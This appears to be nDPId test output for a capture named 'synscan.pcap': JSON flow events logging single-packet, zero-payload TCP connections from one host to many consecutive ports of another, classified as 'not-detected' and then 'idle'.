-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1059,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1066,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":836,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1066,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 